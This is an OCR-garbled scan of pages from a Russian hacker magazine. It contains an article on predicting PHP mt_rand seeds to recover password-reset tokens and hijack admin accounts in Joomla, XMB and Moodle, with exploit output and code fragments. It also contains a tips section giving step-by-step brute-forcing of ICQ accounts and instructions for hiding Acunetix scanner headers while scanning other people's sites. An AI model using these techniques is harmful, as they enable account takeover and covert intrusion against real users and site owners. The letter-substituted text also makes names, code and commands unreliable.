когда начальный ВЕЕБ задается РНР само- 
стоятельно ввиду отсутствия вызова згапсі 
(т1:_5гапсІ). Главная особенность гапсі (згапсі) 
заключается втом, что для функций возвраща- 
емый результат различен под *піх и ѴѴіпсІоѵѵз. 

ПРАКТИКУЕМ УЯЗВИМОСТЬ 

Результат предыдущего вызова гапсН) исполь- 
зуется в чистом виде как начальный ВЕЕР для 
следующего вызова гапсК). По сути: 

" $8ЕЕБ=гапс1 ( ) ; згапсі ( $зеес!) ; $8ЕЕБ=г 
апсі 
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1.06 ЕХРІ.ОІТ: ХМВ 1.9.11 РАЫООМ 
РА55ѴѴ0Р0 ВЕ5ЕТѴІІІ_ЫЕВАВіиТѴ 

Это очень полезно знать, так как не требуется 
искать начальный 5ЕЕЭ, ведь его можно просто 
получить через вывод результата гапсН], если 
таковой имеется. 

Здесь все предельно просто: имеем вывод 
гапсН) — имеем начальный 5ЕЕ0. 

Под ѴѴІЫ00ѴѴ5 результат вызова гапсН) (а зна- 
чит, и начальный 5ЕЕ0] не превышаетчисло 
32767. Милый сердцу баг, — результат можно 
какдва байта перебрать (спасибо ПагОг'у за 
исследование]. 

Под * N IX все немного сложнее — максималь- 
ное число 5ЕЕ0 составляет 2 Л 32. 

Отмечу, что для т1;_гапб (тІ_згапсІ] имеет 
значение версия РНР. 

Для РНР4.х.х<=5.2.0 множество вариантов 
значений, возвращаемых тІ_гапб(], состав- 
ляет 2 Л 31 . Именно 31 — так называемый «баг 
единички»: 

" тС_г апсі ( 1 ) =тС_гапс1 (2) ; шС_ 
гапсі ( 3 ) =тС_гапсЗ ( 4 . 

Максимальный начальный 5ЕЕР не превышает 
числа 2 Л 32, но из-за повторяющихся значений 
количество комбинаций на порядок меньше 
(2 Л 31). Это на 50% ускоряет скорость брута. 

Для РНР >=5.2.1 множество вариантов воз- 
вращаемыхзначений тІ_гапсІ(] составляет 
2 Л 32. Максимальный начальный 5ЕЕ0, как и в 
предыдущем случае — т1:_гапб(2 Л 32], но коли- 
чество комбинаций здесь полное(2 Л 32]. 

ОСОБЕННОСТЬ 
ПЕРЕКРЕСТНОГО ВЛИЯНИЯ 

Функции гапб (зга псі] и тІ_гапсІ (тІ_згапсІ] 
никак не влияют друг на друга. То есть, вызов 
згапсК] не повлияет на результат т1:_гап б (] и 
наоборот. Это бывает важно, когда в приложе- 
нии по какой-либо причине используются оба 
варианта генератора. 

Для осуществления атаки требуются следую- 
щие основные условия: 

1. Мы должны прямо или косвенно иметь вывод 
гапсі (згапсі, тІ_гапсІ, тІ_згапсІ] для вычисле- 
ния начального 5ЕЕ0. 

2. Сервер должен поддерживать Кеер-АІіѵе 
соединения. 

3. РНР должен работать как модуль апача (не 
сді и не базТсд і] . 



\г 



Айѵіаоху: РааВв ВІІай Рмаѵогб весоѵеіу Ѵи1пвг*ЫИсу 
Я* :ис 2009/02/20 

и*г хоаігі*«: гоог 02/20 

Аиеімг: ЗіеГЕп Е»аег *і«І»п.вв*ег 
ЛрріісйЕіса РаяЗВ <- 

Зеѵегісу: КеаК гезізі піаі«г а іеаз со а ЫіМ раааѵсгз гессѵегу 
ѵаІаегаЫІісу сімс віісѵя ессоозс едкѵѳѵм 
Яіак: ВІдЬ 

з: г 5:іш ѴезОог Ііи геіекеЗ гаяЗЭ ѵПіей Гі*«» ъЫя Ши* 

Яеіете&ее і ьсер: / /ѵим.мтоасіаа. «а/*аѵіяогіея/ЗС-2001-01 . иге 

РУЫВВ 1.2.16 ВЫЫО РА55ѴѴ0Р0 
РЕСОѴЕРѴѴІЛ.ЫЕРАВІІ.ІТѴ 

4. Адский патч безопасности сухошина 
(зиЬозЫп] не должен быть установлен. 

При выполнении всехусловий РНР-про- 
цесс, обслуживающий соединение с обоими 
субдоменами, будет одним и тем же. Это даст 
зависимость между вызовами функций гене- 
раторов. 

В БОЙ! 

Для начала вспомним, как проводились атаки 
годичной давности: 

1. Веб-приложение может само иметь прямой, 
либо косвенный вывод результата работы 
генератора. 

Данному случаю соответствует эксплоит под 
ѴѴогсІргезз посредством восстановления 
пароля зарегистрированному юзеру, а затем и 
администратору (тіІѵѵ0гт.сот/ехрІоі1;з/6421 ]. 
Соответственно, из почты юзер узнаеттокен 
восстановления пароля, где по самомутокену 
вычисляется начальный 5ЕЕ0. 

2. Возможно осуществить кросс-атаку через 
веб-приложение, расположенное на субдомене 
данного сервера. 

На да ином принципе основан эксплоит ПагОг'а 
кѴѴогсІргезз'у через РЬрВВ на субдомене, где 
РЬрВВ выводит тІ_гапсІ в результатах поиска 
(га20г.пате/ѵѵр-соп1:еп1:/ирІоасІ5/2008/08/ѵѵр1 . 
Ыті). 

3. Начальный 5ЕЕ0 можно получитьлобовым 
брутфорсом либо брутфорсом по предваритель- 
но сгенерированной радужной таблице готовых 
значений вызовов гапб (т1:_га псі] . 

Как пример, эксплоит РагОг'а «5МР<=1 .1 .5 
Абтіп Резеі Раззѵѵогб ЕхрІоК (ѵѵі п32]» для 
ѴѴІШ0ѴѴ5 ( гагОг.пате/а Нісіез/тадіѵа- 
5ІисЬа]пѵх-сИІ5еІ-сІ~іа5І:-2 ). 

Итак, что общего между этими алгоритмами? 
Пункт#3, пожалуй, исключение, ввиду особен- 
ности гапсН) в ѴѴіпбоѵѵз и брутфорса, присущего, 
так или иначе, всем представленным алгорит- 
мам. Но первые два основаны на отсутствии 
вызова згапб (тІ_5гапсі]. Они базируются 
именно на этом, а по факту — на криптографи- 
ческой уязвимости генератора псевдослучай- 
ных чисел в РНР, из-за недостаточно большого 
начального 5ЕЕ0 2 Л 32(2 Л 31]. 

ПАТЧ НА ПАТЧ, 

ИЛИ КАК НЕ НАДО ДЕЛАТЬ 

Что же сделали создатели РНР, дабы защитить 
нас? Начиная с РНР 5.2.6, начальный 5ЕЕ0 
стал много больше — угадать (перебрать] 
его практически невозможно. Казалось бы, 
проблема решена. А как насчет предсказуе- 
мости? Предсказуемость псевдослучайности 
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от предыдущих вызовов осталасьтакой же, как 
и была! Почему это не показалось разработчи- 
кам косяком в реализации псевдослучайности 

— одному Богу известно. Но факт есть факт — 
зависимость осталась, и хакеры продолжают 
пить шампанское. Интересно, почему? 

АНТИДОТ, 

ИЛИ РЕШЕНИЕ ПРОБЛЕМЫ 

Атаки на тІ_гапсІ(] проходят в стиле «уга- 
дай начальный 5ЕЕБ и сгенерируй по нему 
т1:_гапб(]». А если т1:_5гапб(] задается 
изначально, казалось бы — бага нет. Но это 
нетак! Именно благодаря последовательной 
зависимости (предсказуемости] генера- 
ции тІ_га псі (]-^тІ_га псі (]-^тІ_га псі (]->..., 
атака становится возможной. После вызова 
т1:_5гапб(] в атакуемом приложении необхо- 
димо в Кеер-аііѵе-соединении обратиться к 
взломанному субдомену на сервере с вызовом 
«ргіпі тІ_гапсІ(];». Получив значение І\І-го 
вызова т1;_гапб(] после установки тІ_5гапсІ(], 
остается лишь перебрать локально значения 
т1:_5гапсІ(5ЕЕ0] и восстановить цепочку, пока 
І\І-й вызов т1:_гапб(] не будет равен полученно- 
му ссубдомена. Найденный 5ЕЕБ будет соот- 
ветствовать искомому, и по нему мы сгенериру- 
ем самтокен (пароль] из (N-1) т1;_гапб(]. Выход 
на самом деле прост. Все, что требуется от 
программиста, дабы защитить свое творение, 

— это повторно вызвать згапб (т1:_5гапб] после 
вызова гапб (т1;_гапб]. 

ГЛУМИМСЯ НАД ДВИЖКАМИ 

Настало время рассмотреть те движки, на кото- 
рых сам Бог велел эксплуатировать найденную 
уязвимость. 

• 5оот1а ѴѴеак Вапбот Раззѵѵогб ВезеіТокеп 
ѴиІпегаЬіІФу. 

Уязвимость]оотІа<=1 .5.6 заключается в 1 0-ти 
миллионах комбинаций возможныхтокенов 
сброса пароля. Как демону Стефану удалось 
перебрать 10 млн. вариантовтокенов с до- 
машнего ВЗБ-канала за 3 часа — для меня так 
и останется загадкой. Начиная с версии 1 .5.7, 
разработчики ввели 2 Л 32 (сгс32] комбинаций 
токенов. Однако, переборщикпусть и 10 милли- 
оновтокенов, по-моему нереален. Ното, что в 
последней версии джумлы токен генерируется 
уязвимым катаке на т1:_гапб(] через кроспри- 
ложения\субдомен — это факт. 

• Моосііе 1.x тС_гапс1 ( ) Асітіп ЕезеС 
Раззтлгогсі ЕхрІоіС. 
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т*_5гапсі апсі по! зо гапсіот питЬегз 
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РНР сотез \ѵйИ ічѵо гапОот литЬег депегаіогз патеО гапО() апй ті_гапО(). Тле Ггзі в до! а 
«ѵгаррег агоипр іЛе ІіЬс гапО() !ипс!юп алО ІЛе зесопй опе в ал ітріетепіаііоп о! ІЛе Мегзелпе 
Гчѵвіег рзеиОо гапсіот лыглЬег делегаіог. Во!Л о! (Лезе аідогКЛтз аге зееОеО Ьу а зілдіе 32 Ьй 
іѵѵогй \ѵЛеп ІЛеу аге Гігз! изеО іл а ргосезз ог опе оНЛе зееОіпд !илс!юпз вгалО() ог гШ_згапб() «$ 
саіе<). 

Весаизе о! зисЛ а зЛоН зееО К зЛоиИ Ье оЬѵіоиз Іо еѵегуоле ІЛаі пеІЛег галО() лог тй_гапО() аге 
гапОот елоидЛ Тог сгуріодгарЛіс іізадез. Ночѵеѵег ѵ/еЬ аррьсаііол ргодгаттега ІелО іо ьзе галО() 
ог ті_гап<3() іо сгеаіе сгуріодгарЛіс зесгеіз Ііке раззѵ/огбз, асіг.аіюл кеуз, аиіоіодія соокіез ог 
зеззіол гіелііПегз. Іл талу зйцаіюлз іла зеетз зесиге елоіідЛ, Ьесаызе по! оліу а 32 Ьй зеео лееОз 
[о Ье диеззеО Ьи! аізо ІЛе атоип! оТ ргеѵіоизіу делегат галОот пцтЬегз. ТЛегеТоге ЬгцІеТогсіпд 

5ТЕРАЫ Е55ЕР: МТ_5КАЫ0 АЫй Ы0Т50 КАИРОМ 
КІІІМВЕК5 



[і] Сооойа 1.5.x »с_гапб(і АСЬип Токеп Ехріоіс ѵег. 1.0.0 
[і] соаза Ьу Еіеісг іѲаасісЬас.ги) 

[і] Ьгср://ѵѵѵ.зе]гсіопеіпз.с1е/асіѵіаогіез/5Е-2008-02.схс 
[і] Ьсср://ѵѵѵ.зе]ггіопеіпз.<1е/айѵізогіез/5Е-2008-04.схг 

[1] С'ссхіа: Лгср://1оса1Ьозг/зоопйа/ 

[1] вс_гапй: Ьсср://1оса1ѣозс/яс_гап^.рЬр 

[1] ооояіа ѵегзіоп: 1.5.5 

[і] А±ып еяаіі: асЬаіпѲіосаІЬозс.соа 

[♦] Келсге РНР: 5.1.6 

!+] Ьосаі РНР: 5.1.4 

[ ! ] Аге епсоигадей со иве сЬе зале РНР ѵегзіоп . 

[+] КаіпЪоѵ саЫе 'эоооіаі.5.6 _лЛр5.2.0.гаіпЪоѵ’ [0.048<ЗЬ] аѵаіІаЫе 

[і] Пае: 09:12:34 

[-] Сес сооігіе ♦ іиааеп соісеп 

[+] Соокіе : 9Г6с7е81000аа15с02і0450сЬ45ЬсасЬ=5777е7е656іЬІ10742е37Ь271с€1255с: 

1.06 ЕХРЮІТ: .ЮОМІА ѴѴЕАК КАИРОМ РА55ѴѴ0К0 
КЕ5ЕТТ0КЕКІ ѴШ-ИЕКАВІІ-ІТѴ 



При наличии шелла на субдомене можно восстановить токен сброса 
пароля, вызвав т1:_га псі (] и посчитав 5ЕЕ0 для тІ_згапсІ(]. После чего 
сбросить пароль по найден ному токену, но па роль уйдет на мыло адми- 
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Айѵізогу : РНР 2Е1ІЕКАТЕ_5ЕЕ0<) «еак Яапсіоа НшЬег Зеесі ѴиІпегаЬіІісу 
Кеіеазе Пасе: 2008/05/0с| 

Ьазс Мо4іС1е4: 2008/05/06 



АисЬог: 5се2ап Еззег [зсе^ап.еззег [ас] зексіопеіпз. Ле] 



Арріісасіоп: РНР 5 <- 5.2.5 
РНР 4 <- 4.4.8 



Зеѵегісу: 

Кізіс: 
ѴепДог Зсасиз: 

К#?ег#пе#: 



Кеак гапсіот пияЬег зеесі аідЬс Іеай со зесигісу 
ргоЫетз іп РНР арріісасіспз изіпд гапіоа питЬегз 
Ьоѵ 

Ѵепсіог Ьаз геіеазесі РНР 5.2.6 ѵЬісЬ изез а сііС^егепс зеесі 
Него: / /ѵиѵ . яеігсіопяіпя .ая/ягіѵіяогіея/5Е-2008-02 .гхт: 



РНРѲЕИЕКАТЕ 5ЕЕО0 ѴѴЕАКРАЫООМ ЫІІМВЕР5ЕЕ0 

ѵиіыЕРАВіитѵ 



Асіѵізогу: 
Яеіеазе Пасе: 
ІЛ8С №хиГІ«і: 
АисЬог : 



ііссиіа Кеак Яапіот Раззѵогсі Йезес Тоісеп ѴиІпегаЬіІісу 

2005/09/11 

2008/09/11 

5се?ап Еззег гэсе^ао.езэег[ас] зексіспеіпэ.ие] 



Арріісасіоп: 

Зеѵегісу: 



КІЗІС: 
Ѵеп^ог Зсасиз: 
кеіегепсе ; 



Оосгаіа <= 1.5.7 

Пзаде о г тс гапсі ( ) апй тс_згап!П гог депегас іеп 
оС сгурсодгарЬіс эесгеса ІіЗге гапйот. реззкогй 
гезес сокепз 
ВідЬ 

Ѵепбог Ьаз геіеаэеб а рагсіаііу ніооаіа 1.5.7 

Ьсср: //кѵѵ. зексіопеіпз .сіе/асіѵізогіез/5Е-200е|-04 . сяс 
Ьсср: //«ни. зизрекс . огд/2003/08/П/піС_зхапс1-апсі-пос-эо- 
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77 л 8. Но реальное количество комбинаций ограничено згапсН). При 
эксперименте установлено, что практически нигде нетчистого 
вызова зга псі () или т1;_5гапб(]. Как ни удивительно, это хорошо. В 
случае вызова «тІ_5гапсІ ( (сі о и Ь Іе] тісгоЕтеО * 1000000];» придет- 
ся перебирать лишь 1 млн. комбинаций, а неДмлрд., какпри дефол- 
товом вызове. А значит, и криптостойкость генерации не превышает 
1 млн. комбинаций, — ХМВ 1.9.x т1_га псі (] Абтіп Резеі: Раззѵѵогб 
Ехріоіі. И снова багзасел в системе восстановления пароля. При 
знании пары «ІІзегпате + Е - М а і I » генерируется новый пароль и тут 
же устанавливается. На е- т а і I отправляется уведомление с самим 
паролем. Если у нас имеется шелл на поддомене — можно вызвать 



на, им ы его не увидим. Да и функция генерации пароля совсем другая 
— она основана на згапсН). Это как разтот самый случай, когда в при- 
ложении используются оба генератора. В версии 1 ,9.x ветки в алго- 
ритм генерации пароля добавлен режим повышенной безопасности. 
Так, в простом режиме используется алгоритм «ѵѵогб1+пит+ѵѵогб2», 
где пит — число из 0123456789, а ѵѵогсіі и ѵѵогб — слова из словаря. 
Словарь расположен в ІіЬ/ѵѵогсШзЕМ (доступен прямо из ѴѴеЬ] и по де- 



тІ_гапсІ в Кеер-аііѵе-соединении и восстановить начальное значе- 
ниеВЕЕОдля тІ_5гапсІ. Подбор 5 ЕЕ и при этом занимает считанные 
секунды. 

ПОБЕДАЗАХАКЕРАМИ 

...и это далеко не весь список. Зайди на доодіе.сот/ 

сосі езеа гсЬ ?д=т1:_5га псі (%5С%20 1 ]+%5С(%20 Іа п д : рЬ р иэксперимен- 



фолту содержит 35 слов. Итого, возможно всего лишь 35*1 0*35=1 2250 
комбинаций независимо от гапсН] и згапсН]. Если найти способ обойти 
блокировку при брутфорсе паролей — можно сбросить и перебрать 
его. 

В режиме повышенной безопасности символы перемешиваются 
посредством 5іг_зЬи!!Іе(], которая зависит от згапсН). Количество 
вариантов без учета гапсЦ] и згапсН] громадно — чуть меньше, чем 



тируй сам. Патчаттакие баги, как показала годовая практика, — кри- 
во, нетолько веб-программисты, но и сами разработчики РНР. Правят 
либо авто-ЗЕЕИ, а про предсказуемость забывают (не добавляют 
внешнюю энтропию вроде тб5(тісгоЕте(]] или МуЭОЕовый 'зеіесі: 
гапсН]' и т.д.), либо правят предсказуемость и забывают про авто- 
ВЕЕИ. В общем, хотели как лучше, а получилось как всегда. Хакеры 
опять рулят миром и разбитыми РНР-движками. т 



Ю6 ЕХРЬОІТ: ХМВ 1.9.11 КАМООМ РА55ѴѴ0К0 РЕВЕТ ѴІІЬМЕРАВІЫТУ 

$сЬггз = ’ АВСОЕ Е0НЦКШЮР2Е5 ИТЛЖУг 0123456739аЬссіе г дЫ] кШшсрдг зсиѵ\чху 2 ’ ; 

$пе«разз = ' ' ; 

гаг_згап<і{ (<іоиЫеітісгосіте() * 1000000); 

$деъ = зСг1еп($сЬагз) - 1; 
гог($і = 0; $і < 13; $і++) { 

$пеѵразз .= $сЬагз [тг_гапсі ( 0 , $дес)]; 

} 

$пеѵти5разз = т<і5 ($пе*«разз) ; 

$<іЬ->диегу ("ДРБАІЕ ",Х_РЕІЕЕІХ. "телЬегз 5ЕТ раззксгсі^ $пеѵ.тас15разз ' , рѵсіаге=' 
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ОТКРОИ 

ФЕСТИВАЛИ МИРА 

СОЛНЦЕ. МУЗЫКА. ОКЕАН. ВЫИГРАЙ ПУТЕШЕСТВИЕ НА ДВОИХ. 




ЮЖНАЯ АФРИКА 



I ПРИМИ УЧАСТИЕ В ПРОГРАММЕ, 

| РЕГИСТРИРУЙ КОДЫ С ПАЧЕК САМЕЬ 

I @ на сайте Ш\М\АЛСАМЕІ_-САМЕ.КІІ 
| И или по 5М5 на номер 5601 



ПЕРИОД РЕГИСТРАЦИИ КОДОВ: 

С 18 МАЯ ПО 31 АВГУСТА 2009 Г 
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ХАКЕРСКИЕ 

СЕКРЕТЫ 

ПРОСТЫХ 

ВЕЩЕЙ 



ЛЕОНИД «РОЮ» ОТРОЙКОВ МОРО мііхх 

/котгамАИ-кц/ / мокогашвох.кіі / / мііххгавк.кіі / 




ЗАДАЧА: ВРУЧНУЮ ПРОПАТЧИТЬ 
ІМ-КЛИЕНТ ОІІТІМ ДЛЯ РАБОТЫ С 
НОВОЙ ВЕРСИЕЙ ІСО-ПРОТОКОЛА 



РЕШЕНИЕ: 

В последнее время перебои в работе I СО нередкость. Связано это впервую 
очередь с постоянными обновлениями протокола, вследствие чего боль- 
шинство неофициальных клиентов попросту перестают корректно работать. 
Если у владельцев квипа или крысы есть выход — ждать патч, то обладателям 
ріЛіт’а надеяться не на что, кроме как на самих себя. Впрочем, пропатчить 
утилу самостоятельно не так сложно, для этого следует произвести ряд нехит- 
рых манипуляций: 

1 . Патчим файл озсагргоіосоі.срр, а именно: 

@@ -46,7 +46,7 @@ озсагРгокосоІ : : озсагРгокосоІ (сопзк 
ОЗкгі 



соппескіопЗоскек = пеѵт ОТсрЗоскек (Шз) ; 

Ъиккег = пеѵт ісдВиккег ( Йііз ) ; 

Ъиккег->ореп (ОІСЮеѵісе : :КеасІѴ/гіке) ; 

- кІарЗедНГит = гапб ( ) % 0x8000; 

+ кІарЗедНГит = 0x0000; 
гедЗед = 0x0000; 
кеерАІіѵе = кгие; 
соппескВоз = каізе; 

2. Вносим изменения в файл сІіепЕІсІепЕіЛсаЕіоп.срр (87-ая строка): 

@@ -84,7 +84,7 @@ 

ОВукеАггау сііепкібепкікісакіоп : : декЗед№лпЪег ( ) сопзк 
{ 



□ О&СгіірГОІйЕйВ.Срр - Ѵ/оігіРдгі 




ива 


Файл Главка Вид Клавка Фермат справка 






и & ы а & м % | 






ѵ 10 ѵ Кдоплмчесхий ѵ Ж К Ц 0 


:= 





Йіпеіийе "ЭСАад.Ь" 

Я і гіс 1 исіз |Г сопп«сЪ1оп. Ь |Г 
М і псі ий* "рам од ^ 

Дтсіисіе "В пассЬаппй 1 . Ь" 

КіПСІМЙ* "ОМШДОПОШІ'Ь* 

олсагРгосоейі: ноасагРсоноеоі (еондг ОЗссіпд сассоипг, сопзс, азспьд сргоСИедш 

ООЬЗесй т рагепЪ1 
: ОСЬ! ЕС Ь | ршгепс) 
і ІсдШп [йссошіС) 

# пап* (рсоіі Ій пап*> 

І 

гейіутонмагіа# ■ с сие* 

■ 0; 



сиЕгепсг&киз - оШіаі: 
йеівр$свлиэ “ оііішйі 



сФшіссііп^Ассоипі ■ іаІЗй; 
гесогиісс&ОпМэс " 

Патчим ціЛіпп 

ОВукеАггау зед; 

- диіпкіб пиш = гапб ( ) % Охкккк; 

+ диіпкіб пит = 0x000; 
зед[0] = пит / 0x100; 
зед[1] = пит % 0x100; 
гекигп зед; 

3. Как вариант решения проблемы для сторонних клиентов — изменение 
первоначального значения Зериепсе ІМитЬегна 0. Кстати, данный способ 
был обнаружен ЬіорЬгеак’ом, такчто при желании ты можешь нагуглить 
дополнительную инфу потеме. 



№2 



ЗАДАЧА: ОРГАНИЗОВАТЬ БРУТ 
АСЕК 



*“ ^ 53=“ 



-М-3 



РЕШЕНИЕ: 

Спам-рассылки по асям в последнее время приобретают массовый характер, 
причем, особой популярностьюу спамеров пользуются уин-листы с 6-ти/7-мизнач- 
ными номерками. Такчто, какни крути, а агитироватьза спам я не стану, также, как 
не стану агитировать и за флудасек неприятелей. Тем не менее, о том каксбрутить 
несколько сотен/тысяч іср-номерков — расскажу, и даже не буду спрашивать, зачем 
они тебе нужны :). Итак, первое с чем нам нужно определиться — это софт. Дабы не 
зацикливаться на одном конкретном продукте, я решил остановить выбор на двух 
хорошозарекомендовавшихсебя софтинах — 2Впке и ИВшІе. Начнем, какводит- 
ся, по порядку. Если говорить коротко о функционале 2ВгіЛе, то следует выделить: 

- Возможность КОМПИЛЯЦИИ ПОД *ПІХ И ШІПСІОѴТЗ ОС 

- Наличие консольного динамического интерфейса 

- Поддержка удаленной консоли 

- Работа с соке 4/5 и Нккрз-прокси 



- Наличие файла конфигура- 
ции 

Больше всего нас интересует, ес- 
тественно, первый пункт— возмож- 

Брѵтим а си 

ность компиляции под никсами и 
виндой. Чтобы утебя не возникало 

лишних вопросов, сейчас мы подробно рассмотрим процессустановки, 
настройки и запуска тулзы под разными осями. ЕІачнем с винды: 

1. Сливаем утилу с нашего БѴБ (желательно на удаленный дедик). 

2. Копируем ехе-шник в нужную нам диру, например, СДЕВпЛе. 

3. Запускаем прогу из консоли: 

С : \2Вгике\2Вгике . ехе -о С : \2Вгике\зеккіпдз . кхк 

Какты догадался, в файле зеШпдз.М содержатся настройки брутера, о 
которых мы поговорим позже. А сейчас рассмотрим пошаговую инсталяцию 
софтины в *піх-системе: 
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1. Сливаем сорец брутера гЬпЛе.с с нашего ДВД (можешь смело заюзать 
один из своих никсовых серверов :]. 

2. Компилируем с помощью дсс на никсовой машине: 

# дсс -ІрбПгеасІ гЪгибе.с -о гЪгибе 

ЛИбО: 

# дсс -рбЬгеас! гЪгибе.с -о гЪгибе 

3. На выходе получаем бинарникгЬгиіе в указанном каталоге. 

4. Все параметры запуска совпадаютс виндовыми. 

Теперь немного о конфиге — зеШпдзТхТ Рекомендую обратить внимание на 
такие параметры, как: 

# Зоигсе Гііе 

зоигсеіізб = 1 С : \ 2 ЬгиДе\ зоигсе . ДхР ' //сурс-лист 

# Сооб Гііе 

доосііізк = ' С : \2Ъгибе\дс1. бхб ' //дооб-лист с валидными 
парами уин : пасс 

# НТТРЗ ргоху бііе 

ЪЩДрзІізД = ' С : ХгЬгиДеХргоху . РхР 1 //прокси-лист 

# ЗоскзБ ргоху Гііе 

# зоскзБІізД = 1 ' //соксБ-лист 

# Зоскз4 ргоху Гііе 

# зоскз41ізк = ' ' //сокс4-лист 

# ТНгеабз ашоипк 
Щтгеабз = 15 0 //потоки 

Полагаю, проблем с эксплуатацией не возникнетиты без труда соберешь 
нехилую базу номерков :]. Амы плавно переходим ко второй утиле — ІІВпЛе. 
Для начала о функционале: 



• Ведение статистики по потокам и проксикам 

• Возможность добавления проксиков во время брута 

• Наличие генератора ІЛЫ; Раззѵ^огб 

• Наличие конфига 

• Поддерживается брут по спискам 

Настроить софтинку на рабочий лад довольно просто: 

1. Сливаем тулзу с нашего ДВД 
2. Запускаем ехе-шник из архива 

3. Генерируем листуишпасс с помощью встроенного генератора: 

• По диапазону — выбираем диапазон номеров, которые хо- 
тим брутить 

• По маскам — выбираем маску и цифры, которые нас интере- 
суют 

• По списку — выбираем файл со списком уинов , отдельно 
добавляем пароли, затем генерируем список 

4. Конфигурируем утилу — либо через гуишный интерфейс, либо редактиру- 
ем сопбд.іпі: 

Нббр=Ь.1іРр . бхб // Ысбр-прокси лист 
Зоскз4=зоскз4 . Рхб // сокс4-лист 
Зоскз5=зоскз5 . кхб // соксБ-лист 
Зоигсе=зоигсе . бхб //сурс-лист 
Ваб=Ьаб . бхР // бэд-лист 

Сооб=доос1. бхб // гуд-лист с валидными парами уин : пасс 
ТНгеаб=1000 // потоки 

5. Жмем ЗіагІ и наблюдаем за статой. 
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ЗАДАЧА: ОПРЕДЕЛИТЬ ЭКСКЛЮ- 
ЗИВНОСТЬ ЗАДАННОГО ПАРОЛЯ 



РЕШЕНИЕ: 

На нашем диске мы не раз выкладывали объемные листы с паролями 
для брута по словарю, причем, в последнее время некоторые предпри- 
имчивые товарищи используют в своих пасс-листах не обычный набор 
слов, а список реально используемых паролей, собранных с веба. В 
связи с этим, позвольутебя спросить: уверен ли ты в эксклюзивности 
своих паролей? Затрудняешься ответить? Тогда я тебе помогу. Нет, мы не 
будем перерывать Гугл в поискахтвоего (или не совсем твоего :)) пасса. 

А просто воспользуемся утилой ЕхсІизіѵеРазз от Ыете^’а для чека 
уникальности паролей. Принцип работы проги заключается в поиске 
указанного пасса в соответствующих базахтреххак-форумов (надеюсь, 
азесЬка.ш когда-нибудь вновь будет в строю): 



меЪ-Ьаск. ги 
дгаЬЬегг . сот 
иіпу . ги 



Из опций следует выделить: 



• Возможность поиска пароля с учетом регистра либо без 
такового 

• Сохранение запросов в список 

• Возможность работы с собственной базой паролей, что 
позволяет чекать собственные пассы по уже существующим 
словарям, либо сохранять пароли для пополнения пасс-лис- 
та 

• Наличие автоподстановки (работает с учетом регистра) 

Использовать утилу совсем несложно, для этого: 

1. Сливаем архив с нашего диска 

2. Распаковываем, запускаем ехе-шник 

3. Отмечаем галочками форумы, в базах которых хотим искать пароль. 
Если хотим работать с собственной базой — жмем соответствующий 
баттон и заполняем требуемые поля. 

4. Вбиваем пасс в формочку (не забываем про регистр) 

5. Жмем поиск 

6. Наблюдаем результат в окне ути л ы 

Кстати, прога работаете локальными базами, которыеты при желании 
можешь сомостоятельно дополнить :). 



• В базах содержится около 33 65 постов с четырех разных 
форумов, даты постов — до 13.03. 09 включительно 

• Корректное отображение всех постов 

• Возможность поиска в отдельных базах 

• Полное сохранение формата отображаемого сообщения 

• Наличие кликабельной ссылки на сообщении для возмож- 
ности просмотра оригинала 

• При отсутствии пароля выводится соответствующее опове- 
щение 



Ищем пассы 
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1 ЗАДАЧА: ВРУЧНУЮ УПРАВЛЯТЬ 

К |Лі А ВКЛЮЧЕНИЕМ/ОТКЛЮЧЕНИЕМ 
Ь} 1 АВТОРАНА НАФЛЕШКЕ 



РЕШЕНИЕ: 

Частенько нам приходится юзать свои флэшки на посторонних компах, что 
существенноувеличиваетрискподхватитьочередноготроянчика с заражен- 
ной машины. Причем, многиезверьки умело используют авто ран флешки для 
собственного внедрения в систему. Конечно, можно попросту удалить файл 
аиІогип.іпЕ но ощутимого результата это не принесет, ибо создать новый файл 
авторана большинствутроянов не составит особого труда. Следовательно, 
нужно идти по другому пути — по пути изменения прав доступа каиіогип.іпб 
Здесь есть два варианта — делать это вручную либо автоматизировать про- 
цесс. Мы не будем усложнять себе жизнь и воспользуемся вторым способом, а 
именно — утилой АпЕ АиіоРУ N отЗІезЬ’а. Особенности проги в следующем: 



• Поддерживает только флешки с ЕАТ32 

• Определение файловой системы флешки 

• Автоматически создает файл авторана аиДогип.іп^ 

• Включает/отключает авторан 

• Работает по принципу замены последнего байта в строке 
«АбТОЕТЖ ШЕ» на 0x40 (атрибут внутреннего использова- 
ния) 



Алгоритм работы утилы довольно прост: 

1. Указываем буквудиска флешки, на которой нам необходимо отрубить 
авторан. 

2. Тулза определяеттип файловой системы на заданном диске (если ФС — не 
РАТ32, завершает работу]. 

3. Создается файл авторана аіЛогип.іпЕ 

4 . Далееутила открываетдискна чтение/запись и начинаетискать текст 
«А1Л0В11ШМР». 



№5 



ЗАДАЧА: ИЗБАВИТЬСЯ ОТ ЗАГО- 
ЛОВКОВ, ДОБАВЛЯЕМЫХ АСІІЫЕТІХ 
ПРИ СКАНИРОВАНИИ ѴѴЕВ-УЗЛА 



РЕШЕНИЕ: 

Перед тем, как пользоваться сканерами безопасности, советую прове- 
рить, какую инфу они посылаютна сканируемый ресурс. Незнаю, как 
остальные, а вотАсипеЕх выдаетхакера с потрохами, добавляя собствен- 
ные НТТР-за головки в каждый отправляемый запрос. Они указывают на 
то, что запрос сгенерирован АсипеРх и что нужно бы чтитьсоглашения 
и не сканировать посторонние ресурсы. Ну разве не прелесть? Если уж 
ты решился кого-нибудь просканить, надо от этого груза избавляться. 
Интерфейс АсипеРх предоставляет возможность редактирования и даже 
удаления заголовков (в окне ТооІзЕхрІогег -> НТТР ЕРРог]. Однако эти 
настройки действуюттолько при ручной отсылке запросов и игнориру- 
ются при сканировании в автоматическом режиме. Что ж, вооружимся 
фильтрующим прокси и вырежем их сами. 

1. Забираем Ргіѵохѵ по адресу Еир://5оигсе1югде.пеДрго]есІ:/сІоѵѵп1.оасІіпд. 
рРр?дгоир ісІ=1 1 1 18&РІепате=ргіѵохѵ 3.0.1 2.гір&а=84641926 . 

2 . Распаковываем и переходим к редактированию конфигурационных 
файлов. 

3. Активируем файл с пользовательскими фильтрами, 
сопбід . бхб 

біібегбііе изег . біібег 

4 . Добавляем новый фильтр для АсипеЕх. 

изег . біібег 



► 046 



Еазу 

Наск 




#іпс1и<*е "ѵуі псіона * И" 
#ігк1игіе ,, «<Яо.Н И 
#1псТисІе "еопіо.ГГ 



// поиск участка памяти б буфере 

сЬаг * теттешСсЬаг сНаг ^ра^ет* зиге_^ ЬігИеп, зігецс Теп) 

і, 1; 

с Наг * Ы^пиб; 
сКаг * рх - рагіегп; 

